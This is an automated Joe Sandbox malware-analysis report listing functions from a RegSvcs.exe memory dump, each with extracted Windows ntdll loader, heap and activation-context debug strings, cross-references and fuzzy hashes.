Function 01458620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

8, xrefs: 014952E3
Address of the debug info found in the active list., xrefs: 014954AE, 014954FA
Critical section debug info address, xrefs: 0149541F, 0149552E
Thread identifier, xrefs: 0149553A
Thread is in a state in which it cannot own a critical section, xrefs: 01495543
double initialized or corrupted critical section, xrefs: 01495508
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014954CE
corrupted critical section, xrefs: 014954C2
undeleted critical section in freed memory, xrefs: 0149542B
Critical section address, xrefs: 01495425, 014954BC, 01495534
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014954E2
Critical section address., xrefs: 01495502
Invalid debug info address of this critical section, xrefs: 014954B6
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0149540A, 01495496, 01495519

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: aa67cd27eb4fb66b5506d6c4e3d954bc6307e9ef876c995fadc59ff56a7901f5
Instruction ID: 9a686fc5eb535dfb85e5fe3c5d44e997220b2e45d28826bcedac894c7c062c9d
Opcode Fuzzy Hash: aa67cd27eb4fb66b5506d6c4e3d954bc6307e9ef876c995fadc59ff56a7901f5
Instruction Fuzzy Hash: C4818070E40359AFDF22CF9AC945BAEBBB5BB48714F20412BF504BB2A1D371A945CB50

Function 014529F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01492412
RtlpResolveAssemblyStorageMapEntry, xrefs: 0149261F
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01492498
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01492624
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014922E4
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01492409
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01492506
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014925EB
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014924C0
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01492602
@, xrefs: 0149259B

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: bd52e5143725040ee22edf66f8c3de0502ff6ac159b0e0e625c44685dea23657
Instruction ID: 888f73dd47ae1f7db553effb55d688f1c241389d9e32d743a6ec32d4f13c243f
Opcode Fuzzy Hash: bd52e5143725040ee22edf66f8c3de0502ff6ac159b0e0e625c44685dea23657
Instruction Fuzzy Hash: 650284B1D00229ABDF71DB55CC80FDAB7B8AB54304F4041EBEA09A7262D7706E85CF59

Function 014C8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

DefaultBrowser_NOPUBLISHERID, xrefs: 014C8D00
csrss.exe, xrefs: 014C8B80
SegmentHeap, xrefs: 014C8BE9
heapType, xrefs: 014C8BCB
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 014C8BD0
lsass.exe, xrefs: 014C8BA1
svchost.exe, xrefs: 014C8B68
runtimebroker.exe, xrefs: 014C8B73
services.exe, xrefs: 014C8B96
smss.exe, xrefs: 014C8B8B

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 0c83abf601786824011bab6194c9e5f1e06aad1e4ff5f9e2112854f0acd7f3be
Instruction ID: 2c41340f15f55e98ed5f2eb769c186be12880d444ccf6ccb36a273c17ca30016
Opcode Fuzzy Hash: 0c83abf601786824011bab6194c9e5f1e06aad1e4ff5f9e2112854f0acd7f3be
Instruction Fuzzy Hash: B151E0791043129BC365CF198844BABBBECEF94B58F14091EEA59C3260E770D609CB92

Function 0143AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON

Download Yara Rule

Strings

Status: 0x%08lx, xrefs: 014882D0, 014883AB
LdrpFindLoadedDllInternal, xrefs: 014882D7
minkernel\ntdll\ldrapi.c, xrefs: 01488086, 014883BC
LdrpInitializeDllPath, xrefs: 014880AD
DLL search path passed in externally: %ws, xrefs: 014880A6
minkernel\ntdll\ldrutil.c, xrefs: 014880B7
minkernel\ntdll\ldrfind.c, xrefs: 014882E1
DLL name: %wZ, xrefs: 01488075
LdrGetDllHandleEx, xrefs: 0148807C, 014883B2

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
API String ID: 0-3197712848
Opcode ID: ce849b479121312db9986d0bbfac19f0070b363e0c28451b84d95b76b6ba8fd8
Instruction ID: ca7c982fd32467c3fec989d1617817aa3f1027ca4d136cb24abd735a6e7ac16e
Opcode Fuzzy Hash: ce849b479121312db9986d0bbfac19f0070b363e0c28451b84d95b76b6ba8fd8
Instruction Fuzzy Hash: 3712FEB1A083428BD321DB29C450BABB7E1FBD8714F55092FE9C58B3A1E734D905CB92

Function 014D0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

About to reallocate block at %p to %Ix bytes, xrefs: 014D03BA
Just reallocated block at %p to %Ix bytes, xrefs: 014D05F1
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 014D06EA
HEAP: , xrefs: 014D03A6, 014D04B5, 014D05DD, 014D0682, 014D06D9
HEAP[%wZ]: , xrefs: 014D0399, 014D04A8, 014D05D0, 014D0675, 014D06CC
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 014D069F
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 014D04D3
RtlReAllocateHeap, xrefs: 014D02BF, 014D0362

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 77bbb6585781cfd8da90a8081b6d0add1dda205e23c6ef2133d36f78c4dcd667
Instruction ID: d0d7203109662c9cfc269e09edea84613866ca2398125836f108e0ddd07775bf
Opcode Fuzzy Hash: 77bbb6585781cfd8da90a8081b6d0add1dda205e23c6ef2133d36f78c4dcd667
Instruction Fuzzy Hash: 67D1CB35600686EFDF22DF69C460AAABBF1FF59710F18805EF9499B362C7349942CB10

Function 014A89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

VerifierDebug, xrefs: 014A8CA5
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 014A8A67
AVRF: -*- final list of providers -*- , xrefs: 014A8B8F
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 014A8A3D
HandleTraces, xrefs: 014A8C8F
VerifierFlags, xrefs: 014A8C50
VerifierDlls, xrefs: 014A8CBD

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 7af95a82c8504ae88f4ed2973f3f6510c32e5fcd849b3a02f80cf6f73bf6b652
Instruction ID: 5bc44ce9080fe7f7ed9005cd711d07a64e7536770af910b3c3485b5e38777a83
Opcode Fuzzy Hash: 7af95a82c8504ae88f4ed2973f3f6510c32e5fcd849b3a02f80cf6f73bf6b652
Instruction Fuzzy Hash: 10913272601303AFE322EF29D880B5B77A4EBB5A14F87041EFA516F261D3709C05CB91

Function 0142EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

LdrpResSearchResourceInsideDirectory Enter, xrefs: 0142EB58
, xrefs: 0142F299
{, xrefs: 01484643
R, xrefs: 0142EB62
LdrpResSearchResourceInsideDirectory Exit, xrefs: 0142EB6C
T, xrefs: 0142EB4E

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 795a6c701ebd16444e32b4d3ea3632ab7fd7732d83dcf32a2250fa22427f2f98
Instruction ID: d881c7a6ce7c1916cc3e235bcef9c4f0dbe6ab3ea8c51238fb1585bd1831cdd4
Opcode Fuzzy Hash: 795a6c701ebd16444e32b4d3ea3632ab7fd7732d83dcf32a2250fa22427f2f98
Instruction Fuzzy Hash: 01A24A74A0562A8FDB64DF19C8987AEBBB5AF45304F5442EAD90DA7360DB309EC5CF00

Function 014563FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 0149413A
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 014941FE
minkernel\ntdll\ldrinit.c, xrefs: 014940E9, 0149414B, 0149420F, 01494269
Delaying execution failed with status 0x%08lx, xrefs: 01494258
_LdrpInitialize, xrefs: 014940DF, 01494141, 01494205, 0149425F
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 014940D8

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 116bb20fbfacd9226e81518e80efb0b8990186fd3b63f910591018577d175587
Instruction ID: 73be6e96938dc5e45bd60d5be160becb6f06d182ce75ae329d9aecdad9e922af
Opcode Fuzzy Hash: 116bb20fbfacd9226e81518e80efb0b8990186fd3b63f910591018577d175587
Instruction Fuzzy Hash: EE918A70B003129BEF36DF19D945BAA3FA1BB52B24F56002FE9106B3B2D7B44802C794

Function 0141645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01479A11, 01479A3A
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01479A01
LdrpInitShimEngine, xrefs: 014799F4, 01479A07, 01479A30
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01479A2A
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014799ED
apphelp.dll, xrefs: 01416496

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 7ead988855caf62a77617c1321ccddcf80fb788b43d443fdebedd12aa900d7dd
Instruction ID: 890d4706493bc751ca5a08ee8af25f88387d6667b8d2c4072eb51ca47d0641f1
Opcode Fuzzy Hash: 7ead988855caf62a77617c1321ccddcf80fb788b43d443fdebedd12aa900d7dd
Instruction Fuzzy Hash: 4D5125712083019FE722EF25D841F9B77E8FB94658F01092FF5959B2B4D670E944CB92

Function 01452674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0149219F
SXS: %s() passed the empty activation context, xrefs: 01492165
RtlGetAssemblyStorageRoot, xrefs: 01492160, 0149219A, 014921BA
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 014921BF
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01492178
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01492180

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 2537561b6723bf65ee2dc32981fcf10c33626696ff7975704d728b67c55476cd
Instruction ID: fa3ab336d0c68f2198402695226f4228403077dfbdd4ffab347360447fe4537c
Opcode Fuzzy Hash: 2537561b6723bf65ee2dc32981fcf10c33626696ff7975704d728b67c55476cd
Instruction Fuzzy Hash: 90313B77B00211B7EB11CA9A9C81F5F7F78DB65A40F05006FFA0467272D3B0AA01C7A1

Function 0145C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 01498181, 014981F5
minkernel\ntdll\ldrinit.c, xrefs: 0145C6C3
LdrpInitializeProcess, xrefs: 0145C6C4
Loading import redirection DLL: '%wZ', xrefs: 01498170
LdrpInitializeImportRedirection, xrefs: 01498177, 014981EB
Unable to build import redirection Table, Status = 0x%x, xrefs: 014981E5

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 6bb9af2f63aa04918e9d46b40f6a8c54947f669e6289030c77f4d75d429e36e2
Instruction ID: 5b10ac683a485c3752cd457a3ad9a8e39c9e410d9927aefa314da40231c80e53
Opcode Fuzzy Hash: 6bb9af2f63aa04918e9d46b40f6a8c54947f669e6289030c77f4d75d429e36e2
Instruction Fuzzy Hash: D3313471604306AFD321EF2AD846E1B7B94EFA5B14F05051EF9446B3B1D670ED04C7A2

Function 0146096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01462DF0: LdrInitializeThunk.NTDLL ref: 01462DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01460BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01460BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01460D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01460D74

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 7e4b788887c19774e3186f6c5d4bf1d96e8bad950949895e48a96fed3920ae37
Instruction ID: be7722452b93ba7e49f1b3a722860038372aafb2e775258beb59911b2b78ba9c
Opcode Fuzzy Hash: 7e4b788887c19774e3186f6c5d4bf1d96e8bad950949895e48a96fed3920ae37
Instruction Fuzzy Hash: C3425A719007159FDB21CF28C880BAABBF9FF14318F0445AEE9899B351D770AA85CF61

Function 0142A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

6, xrefs: 0142A3F7
LdrResFallbackLangList Exit, xrefs: 0142A3FF
LdrResFallbackLangList Enter, xrefs: 0142A3EF
8, xrefs: 0142A3E7

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 70f4397bec24a792dbbab7321f74d15ae149b30090675f2571b0ce5551800126
Instruction ID: 8d3d1b25b7a3cec206ee42ff5c7d7af947ca35889ad489cecc251ab2b5a02861
Opcode Fuzzy Hash: 70f4397bec24a792dbbab7321f74d15ae149b30090675f2571b0ce5551800126
Instruction Fuzzy Hash: 2AC1A8741083928FD721DF58C144B6BBBE4BF94304F50496BF9968BB61E374C98ACB52

Function 01458402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

@, xrefs: 01458591
minkernel\ntdll\ldrinit.c, xrefs: 01458421
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0145855E
LdrpInitializeProcess, xrefs: 01458422

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: a77c41e02fb70bff44ca3a883d773fb1e0a0dd319e19e48b642bbe4161b937c4
Instruction ID: 6a7f3be9731f60a2f9ab1d366a308d2c03f42dece25aaed240abe4e76ae72117
Opcode Fuzzy Hash: a77c41e02fb70bff44ca3a883d773fb1e0a0dd319e19e48b642bbe4161b937c4
Instruction Fuzzy Hash: 96919F71508346AFD762DF26CC41F6BBAECFB94658F40092FFA8496162E770D904CB62

Function 0145273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

.Local, xrefs: 014528D8
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014922B6
SXS: %s() passed the empty activation context, xrefs: 014921DE
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 014921D9, 014922B1

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: a68bda192c1391d48d456e046c276d0dc298c9e67e7ca6341cbfcf6c93b1c7ff
Instruction ID: 3783f79714fdc324199df11adf834b6102474dafe03e8977cfcc33c46450a148
Opcode Fuzzy Hash: a68bda192c1391d48d456e046c276d0dc298c9e67e7ca6341cbfcf6c93b1c7ff
Instruction Fuzzy Hash: 3DA1B335A00229DBDB65CF59D884F9AB7B0BF58314F1541EBD908AB362D7709E81CF90

Function 01454AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

RtlDeactivateActivationContext, xrefs: 01493425, 01493432, 01493451
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01493456
SXS: %s() called with invalid flags 0x%08lx, xrefs: 0149342A
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01493437

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: d49d04105aa42e638a3ac5927413755eec869f9e5278e43d8eeeffb58b715b81
Instruction ID: 6086464c78546f53f15ec3136c4d8876445d8cebca6f3b7e175f497a23b0e154
Opcode Fuzzy Hash: d49d04105aa42e638a3ac5927413755eec869f9e5278e43d8eeeffb58b715b81
Instruction Fuzzy Hash: 006114366006129BDB23CF29C841B2BBBE1EF90B50F1A852FE9559F361D730E841CB91

Function 014264AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0148106B
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01481028
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 014810AE
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01480FE5

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: afd552a4cc836205e249d68be37785a02d6ed4e223be132071be892527fbefdd
Instruction ID: d8f3c8a6e6cdbf1d632a9206578de6c95c0b4ef43ac0c14e78310e22b254cec4
Opcode Fuzzy Hash: afd552a4cc836205e249d68be37785a02d6ed4e223be132071be892527fbefdd
Instruction Fuzzy Hash: 297101B19043159FCB21EF15C884B9B7BA8AFA4754F40046AFD488B26AD370D1C9CBD2

Function 01454D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 01493640, 0149366C
LdrpFindDllActivationContext, xrefs: 01493636, 01493662
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0149362F
Querying the active activation context failed with status 0x%08lx, xrefs: 0149365C

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: d1f8c1ebbe4e33a25d8ad88dc80fe8dbbb17b471274ea9fdbf153b41589e2f85
Instruction ID: 6733a739ba62ceaefdab704b309b822011c486f799d584004aebe9384bc7eb0b
Opcode Fuzzy Hash: d1f8c1ebbe4e33a25d8ad88dc80fe8dbbb17b471274ea9fdbf153b41589e2f85
Instruction Fuzzy Hash: E331F822900211AADF739B5DC848B677AA4BB02654F0E412BED185F373F7B09CCA87D5

Function 0144245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

LdrpDynamicShimModule, xrefs: 0148A998
minkernel\ntdll\ldrinit.c, xrefs: 0148A9A2
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0148A992
apphelp.dll, xrefs: 01442462

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 55d8b6681495bff6e75f32e95acf64b5f302f04da27672a0df82e38c40ed4e5f
Instruction ID: 92ee43c7718be0fde8c007ff03d9bc5a618afc364a88b21349369ff5eadd2211
Opcode Fuzzy Hash: 55d8b6681495bff6e75f32e95acf64b5f302f04da27672a0df82e38c40ed4e5f
Instruction Fuzzy Hash: A0312975600202ABD732AF59D885E6EBBB4FB84714F27006FF9106B365C7F45986D740

Function 014329A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01433264
HEAP[%wZ]: , xrefs: 01433255
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0143327D

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 889743bd47919fdb3b29977b48bc4f6ab9b1e5e991314a6704ecddc2bf29ae85
Instruction ID: 123f34774a022377f6ee31b7f4292631afc7eaddcd4b2816e68c0e5c5e925e6c
Opcode Fuzzy Hash: 889743bd47919fdb3b29977b48bc4f6ab9b1e5e991314a6704ecddc2bf29ae85
Instruction Fuzzy Hash: 1892CE71A042499FEB25CF69C444BAEBBF1FF88310F14805EE859AB3A1D774A946CF50

Function 01430770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 014850BD
HEAP[%wZ]: , xrefs: 014850AE
